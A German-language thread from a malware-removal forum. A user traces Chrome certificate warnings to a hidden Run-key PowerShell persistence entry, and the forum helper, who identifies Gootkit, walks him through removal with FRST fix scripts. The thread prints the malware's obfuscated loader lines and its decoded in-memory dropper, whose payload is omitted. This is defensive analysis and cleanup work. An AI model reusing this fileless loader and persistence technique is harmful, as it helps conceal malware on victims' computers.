Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Chrome meldet ungültige Zertifikate

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Thema geschlossen
Alt 25.11.2020, 11:10   #1
mahescho
 
Chrome meldet ungültige Zertifikate - Standard

Chrome meldet ungültige Zertifikate



Hallo,

ich habe jetzt noch keine nähren Analysen (FRST) machen können, da mit der PC noch nicht physisch zur Verfügung steht, möchte aber trotzdem schon mal das Problem schildern.

Seit zwei Tagen ist es so, dass Chrom, und nur Crome (Firefox und Brave ist nicht betrofen) bei jeder (!) Webseite meldet, dass das Zertifikat ungültig ist. Schaue ich mir die Zertifikate an, dann ist der Aussteller immer Godady. Vergleiche ich die Zertifikate ist der Rest (bis auf Serial, Key, usw.) identisch. Es liegt also nahe dass für Chrome der Traffic durch einen Proxy geleitet wird der versucht in den SSL-Traffic einzubrechen.

Ich habe im Zertifikatsstore ein Root-Zertifikat für 127.0.0.1 gefunden. Das reiche ich noch nach, habe ich im Moment nicht vorrätig. Das habe ich vorsorglich entfernt. Nach einem Neustart war das Problem dann weg. Am nächsten Tag war das Problem aber wieder da. Dann habe ich mich weiter umgesehen und in der Registry unter "Run" für den Benutzer folgendes gefunden:

Code:
ATTFilter
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -Command "IEX([Environment]::GetEnvironmentVariable('aebadbbdaffbef', 'User'))"
         
Die dort referenzierte Environment-Variable enthält:

Code:
ATTFilter
for ($i=0;$i -le 500;$i++){Try{$abc=$abc+(Get-ItemProperty -path 'HKCU:\SOFTWARE\aebadbbdaffbef').$i}Catch{}}IEX($abc)
         
Die dort referenzieren Registry-Keys habe ich exportiert und hier angehängt.

Das ist offensichtlich obfuskierter Powershell-Code. Lässt sich herausfinden was der tut?

So viel für Heute dazu, später mehr.

TIA
Matthias
Angehängte Dateien
Dateityp: zip reg.zip (343,6 KB, 34x aufgerufen)

Alt 25.11.2020, 16:17   #2
M-K-D-B
/// TB-Ausbilder
 
Chrome meldet ungültige Zertifikate - Standard

Chrome meldet ungültige Zertifikate







Mein Name ist Matthias und ich werde dir bei der Analyse und der eventuell notwendigen Bereinigung deines Computers helfen.



Das sieht nach Malware aus, die über den Run-Value auf den Schlüssel in der Reg zeigt. Was die Malware macht, kann ich dir nicht sagen.
Es gibt aber Base64 Decoder/Encoder, evtl. bekommt man darüber was raus.

Du scheinst gut in der Materie bewandert zu sein, trotzdem bitte nichts selber löschen... zuerst FRST auszuführen.
Bitte poste die Logdateien von FRST, sobald du sie hast.

Bitte beachten - Unsere Regeln bei der Bereinigung - Welche Informationen wir benötigen:
Für alle Hilfesuchenden! Was muss ich vor der Eröffnung eines Themas beachten?
__________________

__________________

Geändert von M-K-D-B (25.11.2020 um 17:09 Uhr)

Alt 25.11.2020, 19:56   #3
mahescho
 
Chrome meldet ungültige Zertifikate - Standard

Chrome meldet ungültige Zertifikate



Hallo Namensvetter :-)

Base64 ... die Sache mit den Tomaten auf den Augen :-) gleich mal anschauen ... Das mit dem FRST wird noch ein bisschen dauern. Erst muss ich das Gerät in die Hand bekommen. Ich möchte es bis auf weiteres nicht mehr am Netz betreiben.

Eine Sache kann ich aber noch nachtragen: Der Windows-Defender hat mir die powershell.exe angemecker. Daraufhin habe ich mal Desinfect drauf losgelassen, allerdings ohne jedes Ergebnis.
__________________

Alt 25.11.2020, 21:16   #4
M-K-D-B
/// TB-Ausbilder
 
Chrome meldet ungültige Zertifikate - Standard

Chrome meldet ungültige Zertifikate



Ok, danke für die Infos.

Bitte keine Tools mehr blind/alleine laufen lassen, sondern warten, bis von mir weitere Anweisungen kommen.


Warten wir die Logdateien von FRST ab, Spekulationen bringen nichts.

Alt 28.11.2020, 17:31   #5
M-K-D-B
/// TB-Ausbilder
 
Chrome meldet ungültige Zertifikate - Standard

Chrome meldet ungültige Zertifikate



Servus,


wie sieht es aus?

Können wir dein System hier analysieren und bereinigen?
Oder hast du andere Pläne?


Alt 01.12.2020, 14:48   #6
mahescho
 
Chrome meldet ungültige Zertifikate - Standard

Chrome meldet ungültige Zertifikate



So, endlich habe ich die Logs ... habe mir erlaubt auch die Downloads der Privacy wegen zu bereinigen.
Angehängte Dateien
Dateityp: txt FRST.txt (45,5 KB, 49x aufgerufen)
Dateityp: txt Addition.txt (50,6 KB, 43x aufgerufen)

Alt 01.12.2020, 14:58   #7
M-K-D-B
/// TB-Ausbilder
 
Chrome meldet ungültige Zertifikate - Standard

Chrome meldet ungültige Zertifikate



Hast du den HKU-run Wert der Malware (und ggf. weitere Einträge) bereits entfernt oder war das der Windows Defender?

Mal schauen, ob überhaupt noch was davon übrig ist....







Schritt 1
  • Schließe alle offenen Programme und Internet Browser, damit keine Daten verloren gehen.
  • Kopiere den gesamten Inhalt der folgenden Code-Box:
    Code:
    ATTFilter
    Start::
    HKLM-x32\...\Run: [] => [X]
    HKLM\ DisallowedCertificates: B47B03E57CE218674BA202EC9CB2B82702A7C1FB (U)
    DeleteKey: HKCU\Software\aebadbbdaffbef
    DeleteKey: HKCU\Environment\aebadbbdaffbef
    DeleteValue: HKCU\Environment|aebadbbdaffbef
    DeleteValue: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|aebadbbdaffbef
    CMD: ipconfig /flushdns
    CMD: netsh winsock reset
    CMD: netsh advfirewall reset
    CMD: netsh advfirewall set allprofiles state ON
    CMD: Bitsadmin /Reset /Allusers
    powershell: Set-MpPreference -PUAProtection Enabled
    Hosts:
    RemoveProxy:
    SystemRestore: On 
    EmptyTemp:
    End::
             
  • Starte nun FRST und klicke direkt den Reparieren Button.
    Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
  • Gegebenenfalls muss dein Rechner neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.





Schritt 2
  • Starte FRST erneut. Kopiere den Inhalt der folgenden Code-Box oben in das Suchfeld:
    Code:
    ATTFilter
    SearchAll: aebadbbdaffbef
             
  • Klicke auf den Button Datei-Suche.
  • FRST beginnt mit dem Suchlauf. Das kann einige Zeit dauern, bitte gedulde dich!
  • Am Ende wird eine Textdatei Search.txt erstellt.
  • Poste mir deren Inhalt mit deiner nächsten Antwort.





Schritt 3
  • Starte FRST erneut. Vergewissere dich, dass vor Addition.txt ein Haken gesetzt ist und drücke auf Untersuchen.
  • FRST erstellt wieder zwei Logdateien (FRST.txt und Addition.txt).
  • Poste mir beide Logdateien mit deiner nächsten Antwort.





Bitte poste mit deiner nächsten Antwort:
  • die Logdatei des FRST-Fix (fixlog.txt)
  • die Logdatei des FRST-Suchlaufs (Search.txt)
  • die beiden neuen Logdateien von FRST (FRST.txt und Addition.txt)

Alt 02.12.2020, 08:42   #8
mahescho
 
Chrome meldet ungültige Zertifikate - Standard

Chrome meldet ungültige Zertifikate



Bis auf das Zertifikat habe ich nichts bearbeitet. Das Zertifikat habe ich auch nicht gelöscht sondern verschoben. Dass FRST nichts passendes gefunden hat liegt wohl daran, dass es nur den HKCU des angemeldeten Users durchsucht und nicht alle. Ich habe mich jetzt als der Problemuser angemeldet und noch mal suchen lassen. Jetzt findet FRST auch die Keys. IMHO eine kleine Schwäche von FRST :-)

Die Logs sind im Anhang. Das Problemzertifikat habe ich auch exportiert und mit angehängt.

Mich würde primär interessieren was der Powershell-Code getan hat. Das entfernen wäre dann der zweite Schritt. Ich habe mal unter Linux versucht den Powershellcode zu Base64-decoden. Das gelingt mir aber nicht. Jetzt werde ich das noch unter Windows versuchen. Ich möchte unbedingt den Code sehen.
Angehängte Dateien
Dateityp: zip tmp.zip (24,0 KB, 14x aufgerufen)

Alt 02.12.2020, 10:52   #9
mahescho
 
Chrome meldet ungültige Zertifikate - Standard

Chrome meldet ungültige Zertifikate



Ich habe den Powersehll-Code durchgearbeitet und so modifiziert ausgeführt, dass immer nur Dateien erzeugt werden und nichts weiter passiert. Zum Schluss kommt ein Binary heraus, welches auf Virustotal so aussieht:

https://www.virustotal.com/gui/file/973d0318f9d9aec575db054ac9a99d96ff34121473165b10dfba60552a8beed4/detection

Folgendes hat sich gezeigt. Das hier:

Code:
ATTFilter
for ($i=0;$i -le 500;$i++){Try{$abc=$abc+(Get-ItemProperty -path 'HKCU:\SOFTWARE\aebadbbdaffbef').$i}Catch{}}IEX($abc)
         
erzeugt aus den in der Registry gepeicherten Keys das hier:

Code:
ATTFilter
$EnCoFi = @'...sehr viel binäres ...'@
$DefSt = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($EnCoFi),[IO.Compression.CompressionMode]::Decompress)
$UnFiBy = New-Object Byte[](587776)
$DefSt.Read($UnFiBy, 0, 587776) | Out-Null
[Reflection.Assembly]::Load($UnFiBy)
[Test]::Install1()
         
Das $UnFiBy ist dann der Schadcode, der dann auch erkannt wird. Den habe ich wiederum in eine Datei schreiben lassen und dann scannen lassen. Der ganze Powershellkram ist, wie man das halt so macht, nur der Dropper.

Meine Mutmassungen: Das wird so gemacht, damit nichts direkt auf der Platte zu finden ist. Durch den Autostart wird die Malware dann jedes Mal geladen. Der Defender hat aber trotzdem etwas mitbekommen, vielleicht per Verhaltensanalyse, und daher kommen die Meldungen für die powershell.exe

Meine Fragen:

Was ist zu tun ?
Kann man in der Registry sehen wann die Keys erzeugt wurden?

Geändert von mahescho (02.12.2020 um 10:57 Uhr)

Alt 02.12.2020, 15:03   #10
M-K-D-B
/// TB-Ausbilder
 
Chrome meldet ungültige Zertifikate - Standard

Chrome meldet ungültige Zertifikate



Zur Analyse von Gootkit kannst du hier etwas nachlesen:
BleepingComputer: Gootkit malware returns to life alongside REvil ransomware
Malwarebytes: German users targeted with Gootkit banker or REvil ransomware


Ich bin davon ausgegangen, dass du dich mit dem "infizierten Konto" angemeldet hast und nicht mit einem anderen Konto.




Primär geht es hier im Forum um die Entfernung der Malware. Wenn du das selbst in die Hand nehmen möchtest, ist das ok für mich, dann gib kurz Bescheid und wir kürzen das Ganze hier ab.





Ansonsten bitte die folgenden Schritte ausführen und die Logdateien posten....


Schritt 1
  • Schließe alle offenen Programme und Internet Browser, damit keine Daten verloren gehen.
  • Kopiere den gesamten Inhalt der folgenden Code-Box:
    Code:
    ATTFilter
    Start::
    HKLM-x32\...\Run: [] => [X]
    HKLM\ DisallowedCertificates: B47B03E57CE218674BA202EC9CB2B82702A7C1FB (U)
    HKU\S-1-5-21-922372908-1454336370-1889761472-1002\...\Run: [aebadbbdaffbef] => powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -Command "IEX([Environment]::GetEnvironmentVariable('aebadbbdaffbef', 'User'))" <==== ACHTUNG
    DeleteKey: HKU\S-1-5-21-922372908-1454336370-1889761472-1002\Software\aebadbbdaffbef
    DeleteKey: HKU\S-1-5-21-922372908-1454336370-1889761472-1002\Environment\aebadbbdaffbef
    DeleteValue: HKU\S-1-5-21-922372908-1454336370-1889761472-1002\Environment|aebadbbdaffbef
    DeleteValue: HKU\S-1-5-21-922372908-1454336370-1889761472-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|aebadbbdaffbef
    CMD: ipconfig /flushdns
    CMD: netsh winsock reset
    CMD: netsh advfirewall reset
    CMD: netsh advfirewall set allprofiles state ON
    CMD: Bitsadmin /Reset /Allusers
    powershell: Set-MpPreference -PUAProtection Enabled
    Hosts:
    RemoveProxy:
    SystemRestore: On 
    EmptyTemp:
    End::
             
  • Starte nun FRST und klicke direkt den Reparieren Button.
    Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
  • Gegebenenfalls muss dein Rechner neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.





Schritt 2
Führe Malwarebytes' AntiMalware (MBAM) gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei.





Schritt 3
Führe AdwCleaner gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei.






Bitte poste mit deiner nächsten Antwort:
  • die Logdatei des FRST-Fix (fixlog.txt)
  • die Logdatei von MBAM
  • die Logdatei von AdwCleaner

Alt 04.12.2020, 09:22   #11
mahescho
 
Chrome meldet ungültige Zertifikate - Standard

Chrome meldet ungültige Zertifikate



Danke so weit, ich verstehe was das Script tun soll.

Eine letzte Frage: Ist es grundsätzlich eine gute Idee MBAM immer parallel zum Defender aktiv zu haben?

Ich werde den Rechner jetzt komplett platt machen, da ich nicht wissen kann was die Malware noch so alles gemacht hat.

Trotzdem werde ich das alles ausführen und der Vollständigkeit halber alle Logs posten.

Alt 04.12.2020, 11:06   #12
M-K-D-B
/// TB-Ausbilder
 
Chrome meldet ungültige Zertifikate - Standard

Chrome meldet ungültige Zertifikate



Zitat:
Zitat von mahescho Beitrag anzeigen
Eine letzte Frage: Ist es grundsätzlich eine gute Idee MBAM immer parallel zum Defender aktiv zu haben?
Wir empfehlen immer nur einen Echtzeitschutz zu verwenden.
Eventuell lohnt sich ein Blick auf unsere Empfehlungen.




Zitat:
Zitat von mahescho Beitrag anzeigen
Ich werde den Rechner jetzt komplett platt machen, da ich nicht wissen kann was die Malware noch so alles gemacht hat.

Trotzdem werde ich das alles ausführen und der Vollständigkeit halber alle Logs posten.
Eine Neuinstallation ist nie verkehrt.

Die Logdateien musst du wegen mir aber dann nicht mehr posten, die Zeit kannst du dir sparen.

Alles Gute!





Dieses Thema scheint erledigt und wird aus unseren Abos gelöscht. Solltest Du das Thema erneut brauchen, schicke uns bitte eine Erinnerung inklusive Link zum Thema.

Jeder andere bitte hier klicken und ein eigenes Thema erstellen.

Thema geschlossen

Themen zu Chrome meldet ungültige Zertifikate
127.0.0.1, analyse, benutzer, code, firefox, folge, folgendes, gültig, herausfinden, heute, ide, iex, melde, meldet, neustart, powershell, problem, proxy, registry, serial, software, traffic, ungültig, versucht, webseite, windows, windows 10



Ähnliche Themen: Chrome meldet ungültige Zertifikate


  1. Chrome soll eigenen Root-Store für Zertifikate bekommen
    Nachrichten - 04.11.2020 (0)
  2. Chrome, Firefox, Safari: Verkürzte Laufzeit für SSL/TLS-Zertifikate
    Nachrichten - 18.08.2020 (0)
  3. Ungültige MS Dos Funktion
    Alles rund um Windows - 15.01.2017 (30)
  4. Win7- Avast meldet mir Chrome als Bedrohung
    Plagegeister aller Art und deren Bekämpfung - 27.01.2016 (12)
  5. Windows 10: Avast meldet unter Google Chrome ständig blockierte Bedrohung
    Log-Analyse und Auswertung - 20.01.2016 (5)
  6. Windows 10: Beim Surfen mit Google Chrome meldet Avast sehr häufig Bedrohung (URL:Mal)
    Log-Analyse und Auswertung - 15.01.2016 (9)
  7. Win 7:Langsam , Chrome mit Werbung überfüllt, Avast meldet ständig
    Log-Analyse und Auswertung - 29.11.2014 (17)
  8. Win7: Chrome läuft nicht mehr - Avira meldet Fehler: TR/Patched.Ren.Gen
    Log-Analyse und Auswertung - 19.11.2014 (29)
  9. Adwcleaner meldet Google Chrome preferences
    Plagegeister aller Art und deren Bekämpfung - 13.08.2014 (3)
  10. Browser öffnet selbstendig Taps mit dem inhalt Fehler: Ungültige Adresse
    Log-Analyse und Auswertung - 10.03.2014 (9)
  11. Webbrowser Chrome 33 meldet Krachmacher und bietet "überwachte Nutzer"
    Nachrichten - 15.01.2014 (0)
  12. Sicherheitscenter wird immer wieder deaktiviert, chrome meldet Profil Fehler
    Log-Analyse und Auswertung - 10.06.2013 (3)
  13. der server lieferte eine ungültige oder unbekannte rückmeldung
    Alles rund um Windows - 11.12.2010 (3)
  14. windows security alert + malware defence + keine exe ausführbar "ungültige win32 anw"
    Plagegeister aller Art und deren Bekämpfung - 03.01.2010 (3)
  15. Fehlermeldung: Explorer ...ungültige Seite in Modul unbekannt
    Log-Analyse und Auswertung - 02.12.2005 (2)
  16. Fehler durch ungültige Seite/sp.html/se.dll?
    Plagegeister aller Art und deren Bekämpfung - 13.05.2005 (9)
  17. Re:ungültige Zeichen in ihrer E-Mail
    Plagegeister aller Art und deren Bekämpfung - 02.01.2005 (9)

Zum Thema Chrome meldet ungültige Zertifikate - Hallo, ich habe jetzt noch keine nähren Analysen (FRST) machen können, da mit der PC noch nicht physisch zur Verfügung steht, möchte aber trotzdem schon mal das Problem schildern. Seit - Chrome meldet ungültige Zertifikate...
Archiv
Du betrachtest: Chrome meldet ungültige Zertifikate auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.